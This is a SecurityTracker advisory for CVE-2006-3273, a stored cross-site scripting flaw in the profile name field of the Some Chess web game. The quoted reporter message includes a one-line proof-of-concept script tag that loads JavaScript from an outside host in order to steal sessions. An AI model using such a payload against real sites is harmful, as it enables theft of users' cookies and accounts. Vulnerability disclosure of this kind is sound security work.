SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   Some Chess Vendors:   Link, Jon
Some Chess Missing Input Validation Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1016360
SecurityTracker URL:  http://securitytracker.com/id/1016360
CVE Reference:   CVE-2006-3273   (Links to External Site)
Updated:  May 12 2009
Original Entry Date:  Jun 22 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information

Version(s): 1.5 rc1
Description:   A vulnerability was reported in Some Chess. A remote user can conduct cross-site scripting attacks.

The game software does not properly filter HTML code from user-supplied input in the 'New name' profile input box before displaying the input. A remote user can submit specially crafted input that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Some Chess software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

luny reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Some Chess software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.astrodogpress.org/chess/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Somechess v1.5 rc1 - XSS

Somechess v1.5 rc1


Homepage:

http://www.astrodogpress.org/chess/


Affected files:


*Profile input boxes

-----------------------


Upon dumping the sql data into the table if you get errors and it wont create the tables & data (like it did to me), then just remove
 all the " from the sql file. You'll also have to manually add players & their pw's (md5 hashed) via phpmyadmin or whatever you use.
 Theres also a php error on menu.php that you'll have to fix since it won't allow you to connect to  the game DB

-----------------------


XSS vuln with session disclosure from "New name" profile input box.


Data isn't sanatized before being generated. PoC:


<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>


Screenshots:

http://youfucktard.com/xsp/somechess1.jpg

http://youfucktard.com/xsp/somechess2.jpg

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC